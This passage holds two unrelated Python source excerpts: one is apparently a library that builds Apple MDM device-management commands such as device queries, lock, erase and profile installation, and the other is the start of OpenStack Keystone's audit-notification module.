'CommandUUID': str(self._uuid),
'Command': command,
}
class DeviceInformation(Command):
request_type = 'DeviceInformation'
require_access = {AccessRights.QueryDeviceInformation, AccessRights.QueryNetworkInformation}
class Queries(Enum):
"""The Queries enumeration contains all possible Query types for the DeviceInformation command."""
# Table 5 : General Queries
UDID = 'UDID'
Languages = 'Languages'
Locales = 'Locales'
DeviceID = 'DeviceID'
OrganizationInfo = 'OrganizationInfo'
LastCloudBackupDate = 'LastCloudBackupDate'
AwaitingConfiguration = 'AwaitingConfiguration'
AutoSetupAdminAccounts = 'AutoSetupAdminAccounts'
# Table 6 : iTunes Account
iTunesStoreAccountIsActive = 'iTunesStoreAccountIsActive'
iTunesStoreAccountHash = 'iTunesStoreAccountHash'
# Table 7 : Device Queries
DeviceName = 'DeviceName'
OSVersion = 'OSVersion'
BuildVersion = 'BuildVersion'
ModelName = 'ModelName'
Model = 'Model'
ProductName = 'ProductName'
SerialNumber = 'SerialNumber'
DeviceCapacity = 'DeviceCapacity'
AvailableDeviceCapacity = 'AvailableDeviceCapacity'
BatteryLevel = 'BatteryLevel'
CellularTechnology = 'CellularTechnology'
IMEI = 'IMEI'
MEID = 'MEID'
ModemFirmwareVersion = 'ModemFirmwareVersion'
IsSupervised = 'IsSupervised'
IsDeviceLocatorServiceEnabled = 'IsDeviceLocatorServiceEnabled'
IsActivationLockEnabled = 'IsActivationLockEnabled'
IsDoNotDisturbInEffect = 'IsDoNotDisturbInEffect'
EASDeviceIdentifier = 'EASDeviceIdentifier'
IsCloudBackupEnabled = 'IsCloudBackupEnabled'
OSUpdateSettings = 'OSUpdateSettings'
LocalHostName = 'LocalHostName'
HostName = 'HostName'
SystemIntegrityProtectionEnabled = 'SystemIntegrityProtectionEnabled'
ActiveManagedUsers = 'ActiveManagedUsers'
IsMDMLostModeEnabled = 'IsMDMLostModeEnabled'
MaximumResidentUsers = 'MaximumResidentUsers'
# Table 9 : Network Information Queries
ICCID = 'ICCID'
BluetoothMAC = 'BluetoothMAC'
WiFiMAC = 'WiFiMAC'
EthernetMACs = 'EthernetMACs'
CurrentCarrierNetwork = 'CurrentCarrierNetwork'
SIMCarrierNetwork = 'SIMCarrierNetwork'
SubscriberCarrierNetwork = 'SubscriberCarrierNetwork'
CarrierSettingsVersion = 'CarrierSettingsVersion'
PhoneNumber = 'PhoneNumber'
VoiceRoamingEnabled = 'VoiceRoamingEnabled'
DataRoamingEnabled = 'DataRoamingEnabled'
IsRoaming = 'IsRoaming'
PersonalHotspotEnabled = 'PersonalHotspotEnabled'
SubscriberMCC = 'SubscriberMCC'
SubscriberMNC = 'SubscriberMNC'
CurrentMCC = 'CurrentMCC'
CurrentMNC = 'CurrentMNC'
# Maybe undocumented
CurrentConsoleManagedUser = 'CurrentConsoleManagedUser'
Requirements = {
'Languages': [
(Platform.iOS, '>=7'),
(Platform.tvOS, '>=6'),
(Platform.macOS, '>=10.10'),
],
'Locales': [
(Platform.iOS, '>=7'),
(Platform.tvOS, '>=6'),
(Platform.macOS, '>=10.10'),
],
'DeviceID': [
(Platform.tvOS, '>=6'),
],
'OrganizationInfo': [
(Platform.iOS, '>=7'),
],
'LastCloudBackupDate': [
(Platform.iOS, '>=8'),
(Platform.macOS, '>=10.10')
],
'AwaitingConfiguration': [
(Platform.iOS, '>=9'),
],
'AutoSetupAdminAccounts': [
(Platform.macOS, '>=10.11')
],
'BatteryLevel': [
(Platform.iOS, '>=5')
],
'CellularTechnology': [
(Platform.iOS, '>=4.2.6')
],
'iTunesStoreAccountIsActive': [
(Platform.iOS, '>=7'),
(Platform.macOS, '>=10.9')
],
'iTunesStoreAccountHash': [
(Platform.iOS, '>=8'),
(Platform.macOS, '>=10.10')
],
'IMEI': [
(Platform.iOS, '*'),
],
'MEID': [
(Platform.iOS, '*'),
],
'ModemFirmwareVersion': [
(Platform.iOS, '*'),
],
'IsSupervised': [
(Platform.iOS, '>=6'),
],
'IsDeviceLocatorServiceEnabled': [
(Platform.iOS, '>=7'),
],
'IsActivationLockEnabled': [
(Platform.iOS, '>=7'),
(Platform.macOS, '>=10.9')
],
'IsDoNotDisturbInEffect': [
(Platform.iOS, '>=7'),
],
'EASDeviceIdentifier': [
(Platform.iOS, '>=7'),
(Platform.macOS, '>=10.9'),
],
'IsCloudBackupEnabled': [
(Platform.iOS, '>=7.1'),
],
'OSUpdateSettings': [
(Platform.macOS, '>=10.11'),
],
'LocalHostName': [
(Platform.macOS, '>=10.11'),
],
'HostName': [
(Platform.macOS, '>=10.11'),
],
'SystemIntegrityProtectionEnabled': [
(Platform.macOS, '>=10.12'),
],
'ActiveManagedUsers': [
(Platform.macOS, '>=10.11'),
],
'IsMDMLostModeEnabled': [
(Platform.iOS, '>=9.3'),
],
'MaximumResidentUsers': [
(Platform.iOS, '>=9.3'),
]
}
def __init__(self, uuid: Optional[UUID]=None, **kwargs) -> None:
super(DeviceInformation, self).__init__(uuid)
self._attrs = kwargs
@classmethod
def for_platform(cls, platform: Platform, min_os_version: str, queries: Set[Queries] = None) -> 'DeviceInformation':
"""Generate a command that is compatible with the specified platform and OS version.
Args:
platform (Platform): Desired target platform
min_os_version (str): Desired OS version
queries (Set[Queries]): Desired Queries, or default to ALL queries.
Returns:
DeviceInformation instance with supported queries.
"""
def supported(query) -> bool:
if query not in cls.Requirements:
return True
platforms = cls.Requirements[query]
for req_platform, req_min_version in platforms:
if req_platform != platform:
continue
# TODO: version checking
return True # semver only takes maj.min.patch
#return semver.match(min_os_version, req_min_version)
return False
if queries is None:
supported_queries = filter(supported, [q.value for q in cls.Queries])
else:
supported_queries = filter(supported, queries)
return cls(Queries=list(supported_queries))
@property
def queries(self) -> Set[str]:
return self._attrs.get('Queries')
def to_dict(self) -> dict:
"""Convert the command into a dict that will be serializable by plistlib."""
return {
'CommandUUID': str(self._uuid),
'Command': {
'RequestType': type(self).request_type,
'Queries': self._attrs.get('Queries', None),
}
}
class SecurityInfo(Command):
request_type = 'SecurityInfo'
require_access = {AccessRights.SecurityQueries}
def __init__(self, uuid: Optional[UUID]=None, **kwargs) -> None:
super(SecurityInfo, self).__init__(uuid)
self._attrs = kwargs
class DeviceLock(Command):
request_type = 'DeviceLock'
require_access = {AccessRights.DeviceLockPasscodeRemoval}
def __init__(self, uuid: Optional[UUID]=None, **kwargs) -> None:
super(DeviceLock, self).__init__(uuid)
self._attrs = kwargs
def to_dict(self) -> dict:
command = {
'RequestType': type(self).request_type,
'Message': self._attrs.get('Message', 'Device is locked'),
}
if 'PIN' in self._attrs:
command['PIN'] = self._attrs['PIN']
if 'PhoneNumber' in self._attrs:
command['PhoneNumber'] = self._attrs['PhoneNumber']
return {
'CommandUUID': str(self._uuid),
'Command': command,
}
class ClearPasscode(Command):
request_type = 'ClearPasscode'
require_access = {AccessRights.DeviceLockPasscodeRemoval}
require_platforms = {Platform.iOS: '*'}
def __init__(self, uuid: Optional[UUID]=None, **kwargs) -> None:
super(ClearPasscode, self).__init__(uuid)
self._attrs = kwargs
def to_dict(self) -> dict:
return {
'CommandUUID': str(self._uuid),
'Command': {
'RequestType': type(self).request_type,
'UnlockToken': urlsafe_b64decode(self._attrs['UnlockToken'])
}
}
class ProfileList(Command):
request_type = 'ProfileList'
require_access = {AccessRights.ProfileInspection}
def __init__(self, uuid: Optional[UUID]=None, **kwargs) -> None:
super(ProfileList, self).__init__(uuid)
self._attrs = kwargs
class InstallProfile(Command):
request_type = 'InstallProfile'
require_access = {AccessRights.ProfileInstallRemove}
def __init__(self, uuid: Optional[UUID]=None, **kwargs) -> None:
super(InstallProfile, self).__init__(uuid)
self._attrs = kwargs
if 'profile' in kwargs:
profile_data = kwargs['profile'].data
self._attrs['Payload'] = urlsafe_b64encode(profile_data).decode('utf-8')
del self._attrs['profile']
def to_dict(self) -> dict:
return {
'CommandUUID': str(self._uuid),
'Command': {
'RequestType': type(self).request_type,
'Payload': urlsafe_b64decode(self._attrs['Payload']),
}
}
class RemoveProfile(Command):
request_type = 'RemoveProfile'
require_access = {AccessRights.ProfileInstallRemove}
def __init__(self, uuid: Optional[UUID]=None, **kwargs) -> None:
super(RemoveProfile, self).__init__(uuid)
self._attrs = {
'Identifier': kwargs.get('Identifier')
}
def to_dict(self) -> dict:
"""Convert the command into a dict that will be serializable by plistlib."""
return {
'CommandUUID': str(self._uuid),
'Command': {
'RequestType': type(self).request_type,
'Identifier': self._attrs.get('Identifier', None),
}
}
class CertificateList(Command):
request_type = 'CertificateList'
require_access = {AccessRights.ProfileInspection}
def __init__(self, uuid: Optional[UUID]=None, **kwargs) -> None:
super(CertificateList, self).__init__(uuid)
self._attrs = kwargs
class ProvisioningProfileList(Command):
request_type = 'ProvisioningProfileList'
require_access = {AccessRights.ProfileInspection}
def __init__(self, uuid: Optional[UUID]=None, **kwargs):
super(ProvisioningProfileList, self).__init__(uuid)
self._attrs = kwargs
class InstalledApplicationList(Command):
request_type = 'InstalledApplicationList'
require_access: Set[AccessRights] = set()
def __init__(self, uuid: Optional[UUID]=None, **kwargs):
super(InstalledApplicationList, self).__init__(uuid)
self._attrs = {}
self._attrs.update(kwargs)
@property
def managed_apps_only(self) -> Optional[bool]:
return self._attrs.get('ManagedAppsOnly', None)
@managed_apps_only.setter
def managed_apps_only(self, value: bool) -> None:
self._attrs['ManagedAppsOnly'] = value
@property
def identifiers(self) -> Optional[List[str]]:
return self._attrs.get('Identifiers', None)
@identifiers.setter
def identifiers(self, bundle_ids: List[str]) -> None:
"""NOTE: setting identifiers for macOS 10.12 causes an exception in mdmclient."""
self._attrs['Identifiers'] = bundle_ids
def to_dict(self) -> dict:
"""Convert the command into a dict that will be serializable by plistlib."""
command = self._attrs
command.update({'RequestType': type(self).request_type})
return {
'CommandUUID': str(self._uuid),
'Command': command,
}
class InstallApplication(Command):
request_type = 'InstallApplication'
require_access = {AccessRights.ManageApps}
def __init__(self, uuid: Optional[UUID]=None, **kwargs) -> None:
super(InstallApplication, self).__init__(uuid)
self._attrs = {}
if 'application' in kwargs:
app = kwargs['application']
self._attrs['iTunesStoreID'] = app.itunes_store_id
self._attrs['ManagementFlags'] = 1
self._attrs['ChangeManagementState'] = 'Managed'
else:
self._attrs.update(kwargs)
@property
def itunes_store_id(self) -> Optional[int]:
return self._attrs.get('iTunesStoreID', None)
@itunes_store_id.setter
def itunes_store_id(self, id: int):
self._attrs['iTunesStoreID'] = id
if 'Options' not in self._attrs:
self._attrs['Options'] = {}
if 'PurchaseMethod' not in self._attrs['Options']:
self._attrs['Options']['PurchaseMethod'] = 1
def to_dict(self) -> dict:
cmd = super(InstallApplication, self).to_dict()
cmd['Command'].update(self._attrs)
print(cmd)
return cmd
class ManagedApplicationList(Command):
request_type = 'ManagedApplicationList'
require_access = {AccessRights.ManageApps}
class RestartDevice(Command):
request_type = 'RestartDevice'
require_access = {AccessRights.DeviceLockPasscodeRemoval}
require_platforms = {Platform.iOS: '>=10.3'}
class ShutDownDevice(Command):
request_type = 'ShutDownDevice'
require_access = {AccessRights.DeviceLockPasscodeRemoval}
require_platforms = {Platform.iOS: '>=10.3', Platform.macOS: '>=10.13'}
class EraseDevice(Command):
request_type = 'EraseDevice'
require_access = {AccessRights.DeviceErase}
require_platforms = {Platform.iOS: '*', Platform.macOS: '>=10.8'}
class RequestMirroring(Command):
request_type = 'RequestMirroring'
require_platforms = {Platform.iOS: '>=7', Platform.macOS: '>=10.10'}
class StopMirroring(Command):
request_type = 'StopMirroring'
require_platforms = {Platform.iOS: '>=7', Platform.macOS: '>=10.10'}
require_supervised = True
class Restrictions(Command):
request_type = 'Restrictions'
require_access = {AccessRights.RestrictionQueries, AccessRights.ProfileInspection}
class UsersList(Command):
request_type = 'UsersList'
require_platforms = {Platform.iOS: '>=9.3'}
class LogOutUser(Command):
request_type = 'LogOutUser'
require_platforms = {Platform.iOS: '>=9.3'}
class DeleteUser(Command):
request_type = 'DeleteUser'
require_platforms = {Platform.iOS: '>=9.3'}
class EnableLostMode(Command):
request_type = 'EnableLostMode'
require_platforms = {Platform.iOS: '>=9.3'}
require_supervised = True
class DisableLostMode(Command):
request_type = 'DisableLostMode'
require_platforms = {Platform.iOS: '>=9.3'}
require_supervised = True
class DeviceLocation(Command):
request_type = 'DeviceLocation'
require_platforms = {Platform.iOS: '>=9.3'}
require_supervised = True
class PlayLostModeSound(Command):
request_type = 'PlayLostModeSound'
require_platforms = {Platform.iOS: '>=10.3'}
require_supervised = True
class AvailableOSUpdates(Command):
request_type = 'AvailableOSUpdates'
require_platforms = {Platform.macOS: '>=10.11', Platform.iOS: '>=4'}
class Settings(Command):
request_type = 'Settings'
require_platforms = {Platform.macOS: '>=10.9', Platform.iOS: '>=5.0'}
require_access = {AccessRights.ChangeSettings}
def __init__(self,
uuid: Optional[UUID]=None,
device_name: Optional[str]=None,
hostname: Optional[str]=None,
voice_roaming: Optional[bool]=None,
personal_hotspot: Optional[bool]=None,
wallpaper=None,
data_roaming: Optional[bool]=None,
bluetooth: Optional[bool]=None,
**kwargs) -> None:
super(Settings, self).__init__(uuid)
if 'settings' in kwargs:
self._attrs['settings'] = kwargs['settings']
else:
self._attrs['settings']: List[Dict[str, Any]] = []
if device_name is not None:
self._attrs['settings'].append({
'Item': 'DeviceName',
'DeviceName': device_name,
})
if hostname is not None:
self._attrs['settings'].append({
'Item': 'HostName',
'HostName': hostname,
})
if voice_roaming is not None:
self._attrs['settings'].append({
'Item': 'VoiceRoaming',
'Enabled': voice_roaming,
})
if personal_hotspot is not None:
self._attrs['settings'].append({
'Item': 'PersonalHotspot',
'Enabled': personal_hotspot,
})
if data_roaming is not None:
self._attrs['settings'].append({
'Item': 'DataRoaming',
'Enabled': data_roaming,
})
if bluetooth is not None:
self._attrs['settings'].append({
'Item': 'Bluetooth',
'Enabled': bluetooth,
})
def to_dict(self) -> dict:
return {
'CommandUUID': str(self._uuid),
'Command': {
'RequestType': type(self).request_type,
'Settings': self._attrs['settings'],
}
}
| |
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Notifications module for OpenStack Identity Service resources"""
import collections
import functools
import inspect
import logging
import socket
from oslo_config import cfg
from oslo_log import log
from oslo_log import versionutils
import oslo_messaging
import pycadf
from pycadf import cadftaxonomy as taxonomy
from pycadf import cadftype
from pycadf import credential
from pycadf import eventfactory
from pycadf import resource
from keystone.i18n import _, _LE
notifier_opts = [
cfg.StrOpt('default_publisher_id',
help='Default publisher_id for outgoing notifications'),
cfg.StrOpt('notification_format', default='basic',
choices=['basic', 'cadf'],
help='Define the notification format for Identity Service '
'events. A "basic" notification has information about '
'the resource being operated on. A "cadf" notification '
'has the same information, as well as information about '
'the initiator of the event.'),
]
config_section = None
list_opts = lambda: [(config_section, notifier_opts), ]
LOG = log.getLogger(__name__)
# NOTE(gyee): actions that can be notified. One must update this list whenever
# a new action is supported.
_ACTIONS = collections.namedtuple(
'NotificationActions',
'created, deleted, disabled, updated, internal')
ACTIONS = _ACTIONS(created='created', deleted='deleted', disabled='disabled',
updated='updated', internal='internal')
"""The actions on resources."""
CADF_TYPE_MAP = {
'group': taxonomy.SECURITY_GROUP,
'project': taxonomy.SECURITY_PROJECT,
'role': taxonomy.SECURITY_ROLE,
'user': taxonomy.SECURITY_ACCOUNT_USER,
'domain': taxonomy.SECURITY_DOMAIN,
'region': taxonomy.SECURITY_REGION,
'endpoint': taxonomy.SECURITY_ENDPOINT,
'service': taxonomy.SECURITY_SERVICE,
'policy': taxonomy.SECURITY_POLICY,
'OS-TRUST:trust': taxonomy.SECURITY_TRUST,
'OS-OAUTH1:access_token': taxonomy.SECURITY_CREDENTIAL,
'OS-OAUTH1:request_token': taxonomy.SECURITY_CREDENTIAL,
'OS-OAUTH1:consumer': taxonomy.SECURITY_ACCOUNT,
}
SAML_AUDIT_TYPE = 'http://docs.oasis-open.org/security/saml/v2.0'
# resource types that can be notified
_SUBSCRIBERS = {}
_notifier = None
SERVICE = 'identity'
CONF = cfg.CONF
CONF.register_opts(notifier_opts)
# NOTE(morganfainberg): Special case notifications that are only used
# internally for handling token persistence token deletions
INVALIDATE_USER_TOKEN_PERSISTENCE = 'invalidate_user_tokens'
INVALIDATE_USER_PROJECT_TOKEN_PERSISTENCE = 'invalidate_user_project_tokens'
INVALIDATE_USER_OAUTH_CONSUMER_TOKENS = 'invalidate_user_consumer_tokens'
class Audit(object):
"""Namespace for audit notification functions.
This is a namespace object to contain all of the direct notification
functions utilized for ``Manager`` methods.
"""
@classmethod
def _emit(cls, operation, resource_type, resource_id, initiator, public):
"""Directly send an event notification.
:param operation: one of the values from ACTIONS
:param resource_type: type of resource being affected
:param resource_id: ID of the resource affected
:param initiator: CADF representation of the user that created the
request
:param public: If True (default), the event will be sent to the
notifier API. If False, the event will only be sent via
notify_event_callbacks to in process listeners
"""
# NOTE(stevemar): the _send_notification function is
# overloaded, it's used to register callbacks and to actually
# send the notification externally. Thus, we should check
# the desired notification format in the function instead
# of before it.
_send_notification(
operation,
resource_type,
resource_id,
public=public)
if CONF.notification_format == 'cadf' and public:
outcome = taxonomy.OUTCOME_SUCCESS
_create_cadf_payload(operation, resource_type, resource_id,
outcome, initiator)
@classmethod
def created(cls, resource_type, resource_id, initiator=None,
public=True):
cls._emit(ACTIONS.created, resource_type, resource_id, initiator,
public)
@classmethod
def updated(cls, resource_type, resource_id, initiator=None,
public=True):
cls._emit(ACTIONS.updated, resource_type, resource_id, initiator,
public)
@classmethod
def disabled(cls, resource_type, resource_id, initiator=None,
public=True):
cls._emit(ACTIONS.disabled, resource_type, resource_id, initiator,
public)
@classmethod
def deleted(cls, resource_type, resource_id, initiator=None,
public=True):
cls._emit(ACTIONS.deleted, resource_type, resource_id, initiator,
public)
class ManagerNotificationWrapper(object):
"""Send event notifications for ``Manager`` methods.
Sends a notification if the wrapped Manager method does not raise an
``Exception`` (such as ``keystone.exception.NotFound``).
:param operation: one of the values from ACTIONS
:param resource_type: type of resource being affected
:param public: If True (default), the event will be sent to the notifier
API. If False, the event will only be sent via
notify_event_callbacks to in process listeners
"""
def __init__(self, operation, resource_type, public=True,
resource_id_arg_index=1, result_id_arg_attr=None):
self.operation = operation
self.resource_type = resource_type
self.public = public
self.resource_id_arg_index = resource_id_arg_index
self.result_id_arg_attr = result_id_arg_attr
def __call__(self, f):
def wrapper(*args, **kwargs):
"""Send a notification if the wrapped callable is successful."""
try:
result = f(*args, **kwargs)
except Exception:
raise
else:
if self.result_id_arg_attr is not None:
resource_id = result[self.result_id_arg_attr]
else:
resource_id = args[self.resource_id_arg_index]
# NOTE(stevemar): the _send_notification function is
# overloaded, it's used to register callbacks and to actually
# send the notification externally. Thus, we should check
# the desired notification format in the function instead
# of before it.
_send_notification(
self.operation,
self.resource_type,
resource_id,
public=self.public)
# Only emit CADF notifications for public events
if CONF.notification_format == 'cadf' and self.public:
outcome = taxonomy.OUTCOME_SUCCESS
# NOTE(morganfainberg): The decorator form will always use
# a 'None' initiator, since we do not pass context around
# in a manner that allows the decorator to inspect context
# and extract the needed information.
initiator = None
_create_cadf_payload(self.operation, self.resource_type,
resource_id, outcome, initiator)
return result
return wrapper
def created(*args, **kwargs):
"""Decorator to send notifications for ``Manager.create_*`` methods."""
return ManagerNotificationWrapper(ACTIONS.created, *args, **kwargs)
def updated(*args, **kwargs):
"""Decorator to send notifications for ``Manager.update_*`` methods."""
return ManagerNotificationWrapper(ACTIONS.updated, *args, **kwargs)
def disabled(*args, **kwargs):
"""Decorator to send notifications when an object is disabled."""
return ManagerNotificationWrapper(ACTIONS.disabled, *args, **kwargs)
def deleted(*args, **kwargs):
"""Decorator to send notifications for ``Manager.delete_*`` methods."""
return ManagerNotificationWrapper(ACTIONS.deleted, *args, **kwargs)
def internal(*args, **kwargs):
"""Decorator to send notifications for internal notifications only."""
kwargs['public'] = False
return ManagerNotificationWrapper(ACTIONS.internal, *args, **kwargs)
def _get_callback_info(callback):
"""Return list containing callback's module and name.
If the callback is an instance method also return the class name.
:param callback: Function to call
:type callback: function
:returns: List containing parent module, (optional class,) function name
:rtype: list
"""
if getattr(callback, 'im_class', None):
return [getattr(callback, '__module__', None),
callback.im_class.__name__,
callback.__name__]
else:
return [getattr(callback, '__module__', None), callback.__name__]
def register_event_callback(event, resource_type, callbacks):
"""Register each callback with the event.
:param event: Action being registered
:type event: keystone.notifications.ACTIONS
:param resource_type: Type of resource being operated on
:type resource_type: str
:param callbacks: Callback items to be registered with event
:type callbacks: list
:raises ValueError: If event is not a valid ACTION
:raises TypeError: If callback is not callable
"""
if event not in ACTIONS:
raise ValueError(_('%(event)s is not a valid notification event, must '
'be one of: %(actions)s') %
{'event': event, 'actions': ', '.join(ACTIONS)})
if not hasattr(callbacks, '__iter__'):
callbacks = [callbacks]
for callback in callbacks:
if not callable(callback):
msg = _('Method not callable: %s') % callback
LOG.error(msg)
raise TypeError(msg)
_SUBSCRIBERS.setdefault(event, {}).setdefault(resource_type, set())
_SUBSCRIBERS[event][resource_type].add(callback)
if LOG.logger.getEffectiveLevel() <= logging.DEBUG:
# Do this only if its going to appear in the logs.
msg = 'Callback: `%(callback)s` subscribed to event `%(event)s`.'
callback_info = _get_callback_info(callback)
callback_str = '.'.join(i for i in callback_info if i is not None)
event_str = '.'.join(['identity', resource_type, event])
LOG.debug(msg, {'callback': callback_str, 'event': event_str})
def listener(cls):
"""A class decorator to declare a class to be a notification listener.
A notification listener must specify the event(s) it is interested in by
defining a ``event_callbacks`` attribute or property. ``event_callbacks``
is a dictionary where the key is the type of event and the value is a
dictionary containing a mapping of resource types to callback(s).
:data:`.ACTIONS` contains constants for the currently
supported events. There is currently no single place to find constants for
the resource types.
Example::
@listener
class Something(object):
event_callbacks = {
notifications.ACTIONS.created: {
'user': self._user_created_callback,
},
notifications.ACTIONS.deleted: {
'project': [
self._project_deleted_callback,
self._do_cleanup,
]
},
}
"""
def init_wrapper(init):
@functools.wraps(init)
def __new_init__(self, *args, **kwargs):
init(self, *args, **kwargs)
_register_event_callbacks(self)
return __new_init__
def _register_event_callbacks(self):
for event, resource_types in self.event_callbacks.items():
for resource_type, callbacks in resource_types.items():
register_event_callback(event, resource_type, callbacks)
cls.__init__ = init_wrapper(cls.__init__)
return cls
def notify_event_callbacks(service, resource_type, operation, payload):
"""Sends a notification to registered extensions."""
if operation in _SUBSCRIBERS:
if resource_type in _SUBSCRIBERS[operation]:
for cb in _SUBSCRIBERS[operation][resource_type]:
subst_dict = {'cb_name': cb.__name__,
'service': service,
'resource_type': resource_type,
'operation': operation,
'payload': payload}
LOG.debug('Invoking callback %(cb_name)s for event '
'%(service)s %(resource_type)s %(operation)s for'
'%(payload)s', subst_dict)
cb(service, resource_type, operation, payload)
def _get_notifier():
"""Return a notifier object.
If _notifier is None it means that a notifier object has not been set.
If _notifier is False it means that a notifier has previously failed to
construct.
Otherwise it is a constructed Notifier object.
"""
global _notifier
if _notifier is None:
host = CONF.default_publisher_id or socket.gethostname()
try:
transport = oslo_messaging.get_transport(CONF)
_notifier = oslo_messaging.Notifier(transport,
"identity.%s" % host)
except Exception:
LOG.exception(_LE("Failed to construct notifier"))
_notifier = False
return _notifier
def clear_subscribers():
"""Empty subscribers dictionary.
This effectively stops notifications since there will be no subscribers
to publish to.
"""
_SUBSCRIBERS.clear()
def reset_notifier():
"""Reset the notifications internal state.
This is used only for testing purposes.
"""
global _notifier
_notifier = None
def _create_cadf_payload(operation, resource_type, resource_id,
outcome, initiator):
"""Prepare data for CADF audit notifier.
Transform the arguments into content to be consumed by the function that
emits CADF events (_send_audit_notification). Specifically the
``resource_type`` (role, user, etc) must be transformed into a CADF
keyword, such as: ``data/security/role``. The ``resource_id`` is added as a
top level value for the ``resource_info`` key. Lastly, the ``operation`` is
used to create the CADF ``action``, and the ``event_type`` name.
As per the CADF specification, the ``action`` must start with create,
update, delete, etc... i.e.: created.user or deleted.role
However the ``event_type`` is an OpenStack-ism that is typically of the
form project.resource.operation. i.e.: identity.project.updated
:param operation: operation being performed (created, updated, or deleted)
:param resource_type: type of resource being operated on (role, user, etc)
:param resource_id: ID of resource being operated on
:param outcome: outcomes of the operation (SUCCESS, FAILURE, etc)
:param initiator: CADF representation of the user that created the request
"""
if resource_type not in CADF_TYPE_MAP:
target_uri = taxonomy.UNKNOWN
else:
target_uri = CADF_TYPE_MAP.get(resource_type)
target = resource.Resource(typeURI=target_uri,
id=resource_id)
audit_kwargs = {'resource_info': resource_id}
cadf_action = '%s.%s' % (operation, resource_type)
event_type = '%s.%s.%s' % (SERVICE, resource_type, operation)
_send_audit_notification(cadf_action, initiator, outcome,
target, event_type, **audit_kwargs)
def _send_notification(operation, resource_type, resource_id, public=True):
"""Send notification to inform observers about the affected resource.
This method doesn't raise an exception when sending the notification fails.
:param operation: operation being performed (created, updated, or deleted)
:param resource_type: type of resource being operated on
:param resource_id: ID of resource being operated on
:param public: if True (default), the event will be sent
to the notifier API.
if False, the event will only be sent via
notify_event_callbacks to in process listeners.
"""
payload = {'resource_info': resource_id}
notify_event_callbacks(SERVICE, resource_type, operation, payload)
# Only send this notification if the 'basic' format is used, otherwise
# let the CADF functions handle sending the notification. But we check
# here so as to not disrupt the notify_event_callbacks function.
if public and CONF.notification_format == 'basic':
notifier = _get_notifier()
if notifier:
context = {}
event_type = '%(service)s.%(resource_type)s.%(operation)s' % {
'service': SERVICE,
'resource_type': resource_type,
'operation': operation}
try:
notifier.info(context, event_type, payload)
except Exception:
LOG.exception(_LE(
'Failed to send %(res_id)s %(event_type)s notification'),
{'res_id': resource_id, 'event_type': event_type})
def _get_request_audit_info(context, user_id=None):
"""Collect audit information about the request used for CADF.
:param context: Request context
:param user_id: Optional user ID, alternatively collected from context
:returns: Auditing data about the request
:rtype: :class:`pycadf.Resource`
"""
remote_addr = None
http_user_agent = None
project_id = None
domain_id = None
if context and 'environment' in context and context['environment']:
environment = context['environment']
remote_addr = environment.get('REMOTE_ADDR')
http_user_agent = environment.get('HTTP_USER_AGENT')
if not user_id:
user_id = environment.get('KEYSTONE_AUTH_CONTEXT',
{}).get('user_id')
project_id = environment.get('KEYSTONE_AUTH_CONTEXT',
{}).get('project_id')
domain_id = environment.get('KEYSTONE_AUTH_CONTEXT',
{}).get('domain_id')
host = pycadf.host.Host(address=remote_addr, agent=http_user_agent)
initiator = resource.Resource(typeURI=taxonomy.ACCOUNT_USER,
id=user_id, host=host)
if project_id:
initiator.project_id = project_id
if domain_id:
initiator.domain_id = domain_id
return initiator
class CadfNotificationWrapper(object):
"""Send CADF event notifications for various methods.
This function is only used for Authentication events. Its ``action`` and
``event_type`` are dictated below.
- action: authenticate
- event_type: identity.authenticate
Sends CADF notifications for events such as whether an authentication was
successful or not.
:param operation: The authentication related action being performed
"""
def __init__(self, operation):
self.action = operation
self.event_type = '%s.%s' % (SERVICE, operation)
def __call__(self, f):
def wrapper(wrapped_self, context, user_id, *args, **kwargs):
"""Always send a notification."""
initiator = _get_request_audit_info(context, user_id)
target = resource.Resource(typeURI=taxonomy.ACCOUNT_USER)
try:
result = f(wrapped_self, context, user_id, *args, **kwargs)
except Exception:
# For authentication failure send a cadf event as well
_send_audit_notification(self.action, initiator,
taxonomy.OUTCOME_FAILURE,
target, self.event_type)
raise
else:
_send_audit_notification(self.action, initiator,
taxonomy.OUTCOME_SUCCESS,
target, self.event_type)
return result
return wrapper
class CadfRoleAssignmentNotificationWrapper(object):
"""Send CADF notifications for ``role_assignment`` methods.
This function is only used for role assignment events. Its ``action`` and
``event_type`` are dictated below.
- action: created.role_assignment or deleted.role_assignment
- event_type: identity.role_assignment.created or
identity.role_assignment.deleted
Sends a CADF notification if the wrapped method does not raise an
``Exception`` (such as ``keystone.exception.NotFound``).
:param operation: one of the values from ACTIONS (create or delete)
"""
ROLE_ASSIGNMENT = 'role_assignment'
def __init__(self, operation):
self.action = '%s.%s' % (operation, self.ROLE_ASSIGNMENT)
self.deprecated_event_type = '%s.%s.%s' % (SERVICE, operation,
self.ROLE_ASSIGNMENT)
self.event_type = '%s.%s.%s' % (SERVICE, self.ROLE_ASSIGNMENT,
operation)
def __call__(self, f):
def wrapper(wrapped_self, role_id, *args, **kwargs):
"""Send a notification if the wrapped callable is successful."""
""" NOTE(stevemar): The reason we go through checking kwargs
and args for possible target and actor values is because the
create_grant() (and delete_grant()) method are called
differently in various tests.
Using named arguments, i.e.:
create_grant(user_id=user['id'], domain_id=domain['id'],
role_id=role['id'])
Or, using positional arguments, i.e.:
create_grant(role_id['id'], user['id'], None,
domain_id=domain['id'], None)
Or, both, i.e.:
create_grant(role_id['id'], user_id=user['id'],
domain_id=domain['id'])
Checking the values for kwargs is easy enough, since it comes
in as a dictionary
The actual method signature is
create_grant(role_id, user_id=None, group_id=None,
domain_id=None, project_id=None,
inherited_to_projects=False)
So, if the values of actor or target are still None after
checking kwargs, we can check the positional arguments,
based on the method signature.
"""
call_args = inspect.getcallargs(
f, wrapped_self, role_id, *args, **kwargs)
inherited = call_args['inherited_to_projects']
context = call_args['context']
initiator = _get_request_audit_info(context)
target = resource.Resource(typeURI=taxonomy.ACCOUNT_USER)
audit_kwargs = {}
if call_args['project_id']:
audit_kwargs['project'] = call_args['project_id']
elif call_args['domain_id']:
audit_kwargs['domain'] = call_args['domain_id']
if call_args['user_id']:
audit_kwargs['user'] = call_args['user_id']
elif call_args['group_id']:
audit_kwargs['group'] = call_args['group_id']
audit_kwargs['inherited_to_projects'] = inherited
